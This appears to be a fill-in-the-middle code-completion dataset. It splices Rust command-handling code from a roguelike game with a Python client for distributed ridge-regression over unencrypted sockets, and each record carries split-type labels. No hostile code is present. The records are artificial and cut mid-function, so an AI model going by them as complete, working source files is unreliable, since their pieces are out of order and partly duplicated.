Key { code: KeyCode::L, .. } |
Key { code: KeyCode::NumPad6, .. } => Command::Move(Direction::E),
Key { code: KeyCode::Up, .. } |
Key { code: KeyCode::K, .. } |
Key { code: KeyCode::NumPad8, .. } => Command::Move(Direction::N),
Key { code: KeyCode::Down, .. } |
Key { code: KeyCode::J, .. } |
Key { code: KeyCode::NumPad2, .. } => Command::Move(Direction::S),
Key { code: KeyCode::B, .. } |
Key { code: KeyCode::NumPad1, .. } => Command::Move(Direction::SW),
Key { code: KeyCode::N, .. } |
Key { code: KeyCode::NumPad3, .. } => Command::Move(Direction::SE),
Key { code: KeyCode::Y, .. } |
Key { code: KeyCode::NumPad7, .. } => Command::Move(Direction::NW),
Key { code: KeyCode::U, .. } |
Key { code: KeyCode::NumPad9, .. } => Command::Move(Direction::NE),
Key { code: KeyCode::Period, .. } => Command::UseStairs(StairDir::Ascending),
Key { code: KeyCode::Comma, .. } => Command::UseStairs(StairDir::Descending),
Key { code: KeyCode::M, .. } => Command::Look,
Key { code: KeyCode::G, .. } => Command::Pickup,
Key { code: KeyCode::D, .. } => Command::Drop,
Key { code: KeyCode::I, .. } => Command::Inventory,
Key { code: KeyCode::E, .. } => Command::Teleport,
Key { code: KeyCode::F1, .. } => Command::DebugMenu,
_ => Command::Wait,
}
}
}
pub fn process_player_command(context: &mut GameContext, command: Command) -> CommandResult<()> {
match command {
// TEMP: Commands can still be run even if there is no player?
Command::Quit => Err(CommandError::Invalid("Can't quit.")),
Command::Look => cmd_look(context),
Command::UseStairs(dir) => cmd_use_stairs(context, dir),
Command::Pickup => cmd_pickup(context),
Command::Drop => cmd_drop(context),
Command::Inventory => cmd_inventory(context),
Command::Move(dir) => cmd_player_move(context, dir),
Command::Wait => cmd_add_action(context, Action::Wait),
Command::DebugMenu => cmd_debug_menu(context),
Command::Teleport => cmd_teleport(context),
}
}
fn cmd_player_move(context: &mut GameContext, dir: Direction) -> CommandResult<()> {
// Check if we're bumping into something interactive, and if so don't consume a turn.
let position = player_pos(context)?;
let new_pos = position + dir;
let npc_opt = context.state.world.find_entity(
new_pos,
|e| context.state.world.is_npc(*e),
);
if let Some(npc) = npc_opt {
mes!(
context.state.world,
"{}: Hello!",
a = npc.name(&context.state.world)
);
return Ok(());
}
cmd_add_action(context, Action::MoveOrAttack(dir))
}
fn cmd_add_action(context: &mut GameContext, action: Action) -> CommandResult<()> {
context.state.add_action(action);
Ok(())
}
fn cmd_look(context: &mut GameContext) -> CommandResult<()> {
select_tile(context, maybe_examine_tile).map(|_| ())
}
fn cmd_teleport(context: &mut GameContext) -> CommandResult<()> {
mes!(context.state.world, "Teleport where?");
let pos = select_tile(context, |_, _| ())?;
if context.state.world.can_walk(
pos,
Walkability::MonstersBlocking,
)
{
cmd_add_action(context, Action::Teleport(pos))
} else {
Err(CommandError::Invalid("The way is blocked."))
}
}
fn cmd_pickup(context: &mut GameContext) -> CommandResult<()> {
let first_item;
{
let world = &context.state.world;
let pos = player_pos(context)?;
first_item = world.find_entity(pos, |&e| world.ecs().items.has(e))
}
match first_item {
Some(item) => cmd_add_action(context, Action::Pickup(item)),
None => Err(CommandError::Invalid("You grab at air.")),
}
}
fn cmd_drop(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.iter().map(|i| i.name(&context.state.world)).collect();
let idx = menu_choice(context, names).ok_or(CommandError::Cancel)?;
cmd_add_action(context, Action::Drop(items[idx]))
}
fn cmd_inventory(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.into_iter()
.map(|i| {
context.state.world.ecs().names.get(i).unwrap().name.clone()
})
.collect();
let choose = menu_choice_indexed(context, names)?;
mes!(context.state.world, "You chose: {}", a = choose);
Err(CommandError::Cancel)
}
fn find_stair_dest(world: &World, pos: Point, dir: StairDir) -> CommandResult<StairDest> {
let cell = world.cell_const(&pos).ok_or(CommandError::Bug(
"World was not loaded at stair pos!",
))?;
match cell.feature {
Some(CellFeature::Stairs(stair_dir, dest)) => {
if stair_dir != dir {
return Err(CommandError::Cancel);
}
debug!(world.logger, "STAIR at {}: {:?}", pos, dest);
Ok(dest)
},
_ => Err(CommandError::Cancel),
}
}
fn player_pos(context: &GameContext) -> CommandResult<Point> {
let world = &context.state.world;
let player = world.player().ok_or(
CommandError::Bug("No player in the world!"),
)?;
let pos = world.position(player).ok_or(CommandError::Bug(
"Player has no position!",
))?;
Ok(pos)
}
fn cmd_use_stairs(context: &mut GameContext, dir: StairDir) -> CommandResult<()> {
let pos = player_pos(context)?;
let world = &mut context.state.world;
let next = find_stair_dest(world, pos, dir)?;
let (true_next, dest) = load_stair_dest(world, pos, next)?;
world.move_to_map(true_next, dest).unwrap();
debug!(world.logger, "map id: {:?}", world.map_id());
Ok(())
}
fn load_stair_dest(
world: &mut World,
stair_pos: Point,
next: StairDest,
) -> CommandResult<(World, Point)> {
match next {
StairDest::Generated(map_id, dest) => {
debug!(world.logger, "Found stair leading to: {:?}", map_id);
let world = world::serial::load_world(map_id).map_err(|_| {
CommandError::Bug("Failed to load already generated world!")
})?;
Ok((world, dest))
},
StairDest::Ungenerated => {
debug!(world.logger, "Failed to load map, generating...");
let res = {
generate_stair_dest(world, stair_pos)
};
debug!(
world.logger,
"new stairs: {:?}",
world.cell_const(&stair_pos)
);
res
},
}
}
fn generate_stair_dest(world: &mut World, stair_pos: Point) -> CommandResult<(World, Point)> {
let mut new_world = World::new()
.from_other_world(world)
.with_prefab("rogue")
.with_prefab_args(prefab_args!{ width: 100, height: 50, })
.build()
.map_err(|_| CommandError::Bug("Failed to generate stair!"))?;
let prev_id = world.flags().map_id;
let dest_id = new_world.flags().map_id;
let mut stairs_mut = world.cell_mut(&stair_pos).unwrap();
if let Some(CellFeature::Stairs(stair_dir, ref mut dest @ StairDest::Ungenerated)) =
stairs_mut.feature
{
let new_stair_pos = new_world.find_stairs_in().ok_or(CommandError::Bug(
"Generated world has no stairs!",
))?;
*dest = StairDest::Generated(dest_id, new_stair_pos);
new_world.place_stairs(stair_dir.reverse(), new_stair_pos, prev_id, stair_pos);
Ok((new_world, new_stair_pos))
} else {
Err(CommandError::Bug(
"Stairs should have already been found by now...",
))
}
}
use glium::glutin::{VirtualKeyCode, ElementState};
use glium::glutin;
use graphics::Color;
use point::LineIter;
use renderer;
fn maybe_examine_tile(pos: Point, world: &mut World) {
if let Some(mob) = world.mob_at(pos) {
if let Some(player) = world.player() {
if player.can_see_other(mob, world) {
mes!(world, "You see here a {}.", a = mob.name(world));
}
}
}
}
fn draw_targeting_line(player_pos: Option<Point>, world: &mut World) {
let camera = world.flags().camera;
if let Some(player_pos) = player_pos {
draw_line(player_pos, camera, world);
}
}
fn draw_line(start: Point, end: Point, world: &mut World) {
world.marks.clear();
for pos in LineIter::new(start, end) {
world.marks.add(pos, Color::new(255, 255, 255));
}
world.marks.add(end, Color::new(255, 255, 255));
}
/// Allow the player to choose a tile.
pub fn select_tile<F>(context: &mut GameContext, callback: F) -> CommandResult<Point>
where
F: Fn(Point, &mut World),
{
let mut selected = false;
let mut result = context.state.world.flags().camera;
let player_pos = context.state
.world
.player()
.map(|p| context.state.world.position(p))
.unwrap_or(None);
renderer::with_mut(|rc| {
draw_targeting_line(player_pos, &mut context.state.world);
rc.update(context);
rc.start_loop(|renderer, event| {
match event {
glutin::Event::KeyboardInput(ElementState::Pressed, _, Some(code)) => {
println!("Key: {:?}", code);
{
let world = &mut context.state.world;
match code {
VirtualKeyCode::Up => world.flags_mut().camera.y -= 1,
VirtualKeyCode::Down => world.flags_mut().camera.y += 1,
VirtualKeyCode::Left => world.flags_mut().camera.x -= 1,
VirtualKeyCode::Right => world.flags_mut().camera.x += 1,
VirtualKeyCode::Escape => return Some(renderer::Action::Stop),
VirtualKeyCode::Return => {
selected = true;
return Some(renderer::Action::Stop);
},
_ => (),
}
let camera = world.flags().camera;
result = camera;
callback(camera, world);
draw_targeting_line(player_pos, world);
}
renderer.update(context);
},
_ => (),
}
None
});
});
context.state.world.marks.clear();
if selected {
Ok(result)
} else {
Err(CommandError::Cancel)
}
} |
pub fn menu_choice(context: &mut GameContext, choices: Vec<String>) -> Option<usize> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut ChoiceLayer::new(choices))
})
}
pub fn menu_choice_indexed<T: Display + Clone>(
context: &mut GameContext,
mut choices: Vec<T>,
) -> CommandResult<T> {
let strings = choices.iter().cloned().map(|t| t.to_string()).collect();
let idx = menu_choice(context, strings).ok_or(CommandError::Cancel)?;
Ok(choices.remove(idx))
}
use renderer::ui::layers::InputLayer;
pub fn player_input(context: &mut GameContext, prompt: &str) -> Option<String> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut InputLayer::new(prompt))
})
} |
use renderer::ui::layers::ChoiceLayer; | random_line_split |
command.rs | use std::fmt::Display;
use GameContext;
use data::Walkability;
use engine::keys::{Key, KeyCode};
use ecs::traits::*;
use graphics::cell::{CellFeature, StairDest, StairDir};
use logic::Action;
use logic::entity::EntityQuery;
use point::{Direction, Point};
use world::traits::*;
use world::{self, World};
use super::debug_command::*;
pub type CommandResult<T> = Result<T, CommandError>;
pub enum CommandError {
Bug(&'static str),
Invalid(&'static str),
Debug(String),
Cancel,
}
/// A bindable command that can be executed by the player.
pub enum Command {
Move(Direction),
UseStairs(StairDir),
Look,
Pickup,
Drop,
Inventory,
Wait,
Quit,
DebugMenu,
Teleport,
}
impl From<Key> for Command {
fn from(key: Key) -> Command {
match key {
Key { code: KeyCode::Escape, .. } => Command::Quit,
Key { code: KeyCode::Left, .. } |
Key { code: KeyCode::H, .. } |
Key { code: KeyCode::NumPad4, .. } => Command::Move(Direction::W),
Key { code: KeyCode::Right, .. } |
Key { code: KeyCode::L, .. } |
Key { code: KeyCode::NumPad6, .. } => Command::Move(Direction::E),
Key { code: KeyCode::Up, .. } |
Key { code: KeyCode::K, .. } |
Key { code: KeyCode::NumPad8, .. } => Command::Move(Direction::N),
Key { code: KeyCode::Down, .. } |
Key { code: KeyCode::J, .. } |
Key { code: KeyCode::NumPad2, .. } => Command::Move(Direction::S),
Key { code: KeyCode::B, .. } |
Key { code: KeyCode::NumPad1, .. } => Command::Move(Direction::SW),
Key { code: KeyCode::N, .. } |
Key { code: KeyCode::NumPad3, .. } => Command::Move(Direction::SE),
Key { code: KeyCode::Y, .. } |
Key { code: KeyCode::NumPad7, .. } => Command::Move(Direction::NW),
Key { code: KeyCode::U, .. } |
Key { code: KeyCode::NumPad9, .. } => Command::Move(Direction::NE),
Key { code: KeyCode::Period, .. } => Command::UseStairs(StairDir::Ascending),
Key { code: KeyCode::Comma, .. } => Command::UseStairs(StairDir::Descending),
Key { code: KeyCode::M, .. } => Command::Look,
Key { code: KeyCode::G, .. } => Command::Pickup,
Key { code: KeyCode::D, .. } => Command::Drop,
Key { code: KeyCode::I, .. } => Command::Inventory,
Key { code: KeyCode::E, .. } => Command::Teleport,
Key { code: KeyCode::F1, .. } => Command::DebugMenu,
_ => Command::Wait,
}
}
}
pub fn process_player_command(context: &mut GameContext, command: Command) -> CommandResult<()> {
match command {
// TEMP: Commands can still be run even if there is no player?
Command::Quit => Err(CommandError::Invalid("Can't quit.")),
Command::Look => cmd_look(context),
Command::UseStairs(dir) => cmd_use_stairs(context, dir),
Command::Pickup => cmd_pickup(context),
Command::Drop => cmd_drop(context),
Command::Inventory => cmd_inventory(context),
Command::Move(dir) => cmd_player_move(context, dir),
Command::Wait => cmd_add_action(context, Action::Wait),
Command::DebugMenu => cmd_debug_menu(context),
Command::Teleport => cmd_teleport(context),
}
}
fn cmd_player_move(context: &mut GameContext, dir: Direction) -> CommandResult<()> {
// Check if we're bumping into something interactive, and if so don't consume a turn.
let position = player_pos(context)?;
let new_pos = position + dir;
let npc_opt = context.state.world.find_entity(
new_pos,
|e| context.state.world.is_npc(*e),
);
if let Some(npc) = npc_opt {
mes!(
context.state.world,
"{}: Hello!",
a = npc.name(&context.state.world)
);
return Ok(());
}
cmd_add_action(context, Action::MoveOrAttack(dir))
}
fn cmd_add_action(context: &mut GameContext, action: Action) -> CommandResult<()> {
context.state.add_action(action);
Ok(())
}
fn cmd_look(context: &mut GameContext) -> CommandResult<()> {
select_tile(context, maybe_examine_tile).map(|_| ())
}
fn cmd_teleport(context: &mut GameContext) -> CommandResult<()> {
mes!(context.state.world, "Teleport where?");
let pos = select_tile(context, |_, _| ())?;
if context.state.world.can_walk(
pos,
Walkability::MonstersBlocking,
)
{
cmd_add_action(context, Action::Teleport(pos))
} else {
Err(CommandError::Invalid("The way is blocked."))
}
}
fn cmd_pickup(context: &mut GameContext) -> CommandResult<()> {
let first_item;
{
let world = &context.state.world;
let pos = player_pos(context)?;
first_item = world.find_entity(pos, |&e| world.ecs().items.has(e))
}
match first_item {
Some(item) => cmd_add_action(context, Action::Pickup(item)),
None => Err(CommandError::Invalid("You grab at air.")),
}
}
fn cmd_drop(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.iter().map(|i| i.name(&context.state.world)).collect();
let idx = menu_choice(context, names).ok_or(CommandError::Cancel)?;
cmd_add_action(context, Action::Drop(items[idx]))
}
fn cmd_inventory(context: &mut GameContext) -> CommandResult<()> {
let player = context.state.world.player().ok_or(CommandError::Bug(
"No player in the world!",
))?;
let items = context.state.world.entities_in(player);
let names = items.into_iter()
.map(|i| {
context.state.world.ecs().names.get(i).unwrap().name.clone()
})
.collect();
let choose = menu_choice_indexed(context, names)?;
mes!(context.state.world, "You chose: {}", a = choose);
Err(CommandError::Cancel)
}
fn find_stair_dest(world: &World, pos: Point, dir: StairDir) -> CommandResult<StairDest> {
let cell = world.cell_const(&pos).ok_or(CommandError::Bug(
"World was not loaded at stair pos!",
))?;
match cell.feature {
Some(CellFeature::Stairs(stair_dir, dest)) => {
if stair_dir != dir {
return Err(CommandError::Cancel);
}
debug!(world.logger, "STAIR at {}: {:?}", pos, dest);
Ok(dest)
},
_ => Err(CommandError::Cancel),
}
}
fn player_pos(context: &GameContext) -> CommandResult<Point> {
let world = &context.state.world;
let player = world.player().ok_or(
CommandError::Bug("No player in the world!"),
)?;
let pos = world.position(player).ok_or(CommandError::Bug(
"Player has no position!",
))?;
Ok(pos)
}
fn cmd_use_stairs(context: &mut GameContext, dir: StairDir) -> CommandResult<()> {
let pos = player_pos(context)?;
let world = &mut context.state.world;
let next = find_stair_dest(world, pos, dir)?;
let (true_next, dest) = load_stair_dest(world, pos, next)?;
world.move_to_map(true_next, dest).unwrap();
debug!(world.logger, "map id: {:?}", world.map_id());
Ok(())
}
fn load_stair_dest(
world: &mut World,
stair_pos: Point,
next: StairDest,
) -> CommandResult<(World, Point)> {
match next {
StairDest::Generated(map_id, dest) => {
debug!(world.logger, "Found stair leading to: {:?}", map_id);
let world = world::serial::load_world(map_id).map_err(|_| {
CommandError::Bug("Failed to load already generated world!")
})?;
Ok((world, dest))
},
StairDest::Ungenerated => {
debug!(world.logger, "Failed to load map, generating...");
let res = {
generate_stair_dest(world, stair_pos)
};
debug!(
world.logger,
"new stairs: {:?}",
world.cell_const(&stair_pos)
);
res
},
}
}
fn generate_stair_dest(world: &mut World, stair_pos: Point) -> CommandResult<(World, Point)> {
let mut new_world = World::new()
.from_other_world(world)
.with_prefab("rogue")
.with_prefab_args(prefab_args!{ width: 100, height: 50, })
.build()
.map_err(|_| CommandError::Bug("Failed to generate stair!"))?;
let prev_id = world.flags().map_id;
let dest_id = new_world.flags().map_id;
let mut stairs_mut = world.cell_mut(&stair_pos).unwrap();
if let Some(CellFeature::Stairs(stair_dir, ref mut dest @ StairDest::Ungenerated)) =
stairs_mut.feature
{
let new_stair_pos = new_world.find_stairs_in().ok_or(CommandError::Bug(
"Generated world has no stairs!",
))?;
*dest = StairDest::Generated(dest_id, new_stair_pos);
new_world.place_stairs(stair_dir.reverse(), new_stair_pos, prev_id, stair_pos);
Ok((new_world, new_stair_pos))
} else {
Err(CommandError::Bug(
"Stairs should have already been found by now...",
))
}
}
use glium::glutin::{VirtualKeyCode, ElementState};
use glium::glutin;
use graphics::Color;
use point::LineIter;
use renderer;
fn maybe_examine_tile(pos: Point, world: &mut World) {
if let Some(mob) = world.mob_at(pos) {
if let Some(player) = world.player() {
if player.can_see_other(mob, world) {
mes!(world, "You see here a {}.", a = mob.name(world));
}
}
}
}
fn draw_targeting_line(player_pos: Option<Point>, world: &mut World) {
let camera = world.flags().camera;
if let Some(player_pos) = player_pos {
draw_line(player_pos, camera, world);
}
}
fn | (start: Point, end: Point, world: &mut World) {
world.marks.clear();
for pos in LineIter::new(start, end) {
world.marks.add(pos, Color::new(255, 255, 255));
}
world.marks.add(end, Color::new(255, 255, 255));
}
/// Allow the player to choose a tile.
pub fn select_tile<F>(context: &mut GameContext, callback: F) -> CommandResult<Point>
where
F: Fn(Point, &mut World),
{
let mut selected = false;
let mut result = context.state.world.flags().camera;
let player_pos = context.state
.world
.player()
.map(|p| context.state.world.position(p))
.unwrap_or(None);
renderer::with_mut(|rc| {
draw_targeting_line(player_pos, &mut context.state.world);
rc.update(context);
rc.start_loop(|renderer, event| {
match event {
glutin::Event::KeyboardInput(ElementState::Pressed, _, Some(code)) => {
println!("Key: {:?}", code);
{
let world = &mut context.state.world;
match code {
VirtualKeyCode::Up => world.flags_mut().camera.y -= 1,
VirtualKeyCode::Down => world.flags_mut().camera.y += 1,
VirtualKeyCode::Left => world.flags_mut().camera.x -= 1,
VirtualKeyCode::Right => world.flags_mut().camera.x += 1,
VirtualKeyCode::Escape => return Some(renderer::Action::Stop),
VirtualKeyCode::Return => {
selected = true;
return Some(renderer::Action::Stop);
},
_ => (),
}
let camera = world.flags().camera;
result = camera;
callback(camera, world);
draw_targeting_line(player_pos, world);
}
renderer.update(context);
},
_ => (),
}
None
});
});
context.state.world.marks.clear();
if selected {
Ok(result)
} else {
Err(CommandError::Cancel)
}
}
use renderer::ui::layers::ChoiceLayer;
pub fn menu_choice(context: &mut GameContext, choices: Vec<String>) -> Option<usize> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut ChoiceLayer::new(choices))
})
}
pub fn menu_choice_indexed<T: Display + Clone>(
context: &mut GameContext,
mut choices: Vec<T>,
) -> CommandResult<T> {
let strings = choices.iter().cloned().map(|t| t.to_string()).collect();
let idx = menu_choice(context, strings).ok_or(CommandError::Cancel)?;
Ok(choices.remove(idx))
}
use renderer::ui::layers::InputLayer;
pub fn player_input(context: &mut GameContext, prompt: &str) -> Option<String> {
renderer::with_mut(|rc| {
rc.update(context);
rc.query(&mut InputLayer::new(prompt))
})
}
| draw_line | identifier_name |
vanilla.py | # vanilla.py (DONOR)
# vanilla donor is the vanilla version of a donor
# that is, it uses unencrypted sockets, no SSL/TLS
# and performs the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha")
self.hasAlpha = False
else:
#failed
self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def negotiate(self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
_mnegform = NegForm(self) #creates the negotiation form
self.verbose("Negform created. Beginning Negotation...")
try:
negstr = json.dumps(_mnegform.primary) #obtains the primary neg data
self._msocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._msocket.connect( ahostaddr ) #attempting to connect to the host (central)
self.debug("Host connected. Sending negstr")
smsg.send( self._msocket, negstr )
self.debug("Negotiation form sent to central. Awaiting synchronization")
self._mnegform = NegForm( json.loads( smsg.recv( self._msocket ) ) )
self.info("Synchronized form:")
self._mnegform.display()
self.partition_internals( self._mnegform.primary["bsize"] )
self.kernel = self._npdc.computeKernel()
if not type(self.kernel) == numpy.ndarray:
self.warn("Kernel computational error!")
else:
|
except Exception as e:
self.expt(str(e),traceback.format_exc())
finally:
return self.hasNegotiated()
##############################################################################################
# These are common throughout almost all implementation and thus are implemented in the ABC
# updated: migrated from the conceptual class to this.
##############################################################################################
def display_internals(self):
'''invokes a display command to display the internal content using any data controllers'''
if self._npdc is not None:
self._npdc.show()
if self._mnegform is not None:
self._mnegform.display()
def partition_internals(self, s_point):
'''invokes a partition command to perform splitting of the data set into the train/test'''
if self._npdc is not None:
self._npdc.batch(s_point)
else:
self.error("Failed to partition. NPDC is null!")
def normalize_internals(self):
'''perform normalization on the internal dataset, please call partition again'''
if self._npdc is not None:
self._npdc.stdnorm()
else:
self.error("Failed to normalize. NPDC is null!")
def sizeof_internals(self):
if self._npdc is not None:
return self._npdc.size()
else:
self.error("Failed to obtain sizes. NPDC is null!")
def shutdown_connections(self):
try:
self._msocket.close()
except Exception as e:
self.expt(str(e))
| self.verbose("Partitioned and computed the kernel",self.kernel.shape) | conditional_block |
vanilla.py | # vanilla.py (DONOR)
# vanilla donor is the vanilla version of a donor
# that is, it uses unencrypted sockets, no SSL/TLS
# and performs the most basic operations (generic)
from . import ConceptDonor
import csv, json
import numpy, pandas
import socket
import traceback
from io import StringIO
import traceback
# sklearn
from sklearn import preprocessing
# local
from preproc.aux import serialize, deserialize
import preproc.negotiate as negotiate
import preproc.controller as controller
NPDController = controller.NPDController
NegForm = negotiate.NegForm
import pyioneer.network.tcp.smsg as smsg
class VanillaDonor(ConceptDonor):
# dimension of the target. for multivariate, this > 1
tdim = 1
compd = numpy.double
def __init__(self,filename,ahasTarget, htype, skipc = 0, adelimiter=';', aquotechar ='"',
verbose=False, debug=False,owarn=False):
super().__init__(verbose=verbose,debug=debug)
'''creates the vanilla donor by reading in a file, filles the file
up and will read based on what the donor is created as (hasTarget or no?)'''
self._npdc = NPDController(verbose,debug,owarn)
self.hasTarget = ahasTarget
self._npdc.read( filename, ahasTarget,htype, skipc = skipc, adelimiter = adelimiter,
aquotechar = aquotechar)
# required implementations (the constructor must read in to fill up _mDmat, and
# possibly _mTvct if it hasTarget. the hasTarget must also be set to True if
# the donor truly possess the targets
def conntrain(self):
'''conntrain should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server and fill in the received alpha to _mdist_alpha'''
if( self.hasNegotiated() ):
self.verbose("Sending kernel to central")
#dumped = json.dumps( self.kernel.tolist() ) # THIS line is crashing the system (for size 10k)
dumped = serialize( self.kernel )
self.verbose("Total serial dump: {} bytes".format(len(dumped)))
smsg.send( self._msocket, dumped ) #json dump and send the array
# await confirmation
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
# proceed
if( self.hasTarget ):
# dump the target_train to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='train'))
smsg.send( self._msocket, dumped)
# await for alpha
self.info("All Kernels sent. Awaiting central response.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
try:
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
self.hasAlpha = False
except UnicodeDecodeError :
self.verbose("Unicode decode failed. Proceeding with deserialization")
self._mdistalpha = deserialize(rcv)
self.info("Distributed alpha received.")
self.hasAlpha=True
self.recover_weights() # perform weight recovery
else:
self.error("rcv is null. Receiving error _mdistalpha")
self.hasAlpha = False
else:
#failed
self.error("Failed to receive ACKN from host. Terminating conntrain")
self.hasAlpha = False
else:
self.error("This donor has not synchronized the params with the central,\
please run negotiate( addr ) first !")
self.hasAlpha = False
return self.hasAlpha
def conntest(self):
'''conntest should begin connection with the central, send in the
_mDmat_train and (if it has the target) _mTvct_train. await response
from server which it will return the error rating of the model
RETURNS True upon No errors. False otherwise'''
if( self.isTrained ):
aggregate = self._npdc.get( side="data",batch="test").dot( self._mweights )
self.verbose("Sending test prediction to central",aggregate.shape)
#self.raw( aggregate )
dumped = serialize( aggregate )
smsg.send( self._msocket, dumped )
repmsg = self._msocket.recv(4)
if( repmsg.decode('utf-8') == "ACKN" ):
#proceed
if( self.hasTarget ):
# dump the target_test to bytes and send it on over socket
dumped = serialize( self._npdc.get(side='target',batch='test'))
smsg.send( self._msocket, dumped )
#await for test results
self.info("All Aggregates sent. Awaiting results.")
rcv = smsg.recv( self._msocket )
if(rcv != None):
if( rcv.decode('utf-8') == 'ABRT'):
self.error("Abort request by central.")
else:
self._mres = json.loads(rcv)
self.verbose("Received DML test results:")
self.info("MSE:", self._mres.get("mse"))
self.info("R2S:", self._mres.get("r2s"))
return True
else:
self.error("rcv is null. Receiving error on _mres")
else:
self.error("Failed to receive ACKN from host. Terminating conntest")
else:
self.error("Weights not available. Is the donor trained ?")
return False
def connpred(self):
#TODO: figure out how to implement this
pass
def recover_weights(self, colmajor=False):
'''recovers the weight'''
if( self.hasAlpha ):
ool = (1/self._mnegform.primary['rrlambda'])
self.debug("OOL (lval):",ool)
if( type(ool) != float and type(ool) != int):
self.warn("OOL not a float or int")
if( not colmajor ):
self._mweights = ool*self._npdc.get(\
side="data",batch="train").transpose().dot(\
self._mdistalpha)
else:
self._mweights = ool*self._npdc.get(\
side="data",batch="train").dot(\
self._mdistalpha)
if( type(self._mweights) == numpy.ndarray ):
self.isTrained = True
self.info("Weights recovered successfully",self._mweights.shape)
self.debug("Weights array:")
self.raw( self._mweights )
else:
self.isTrained = False
else:
self.isTrained = False
# common functions
def negotiate(self,ahostaddr):
'''start negotation, first sends in the donor's own prepared negform to inform the
central about the number of entries/features, it is expected that _mDmat is read
from a file/stdin before this
@params ahostaddr - a tuple ('localhost',portnumber i.e 8000)'''
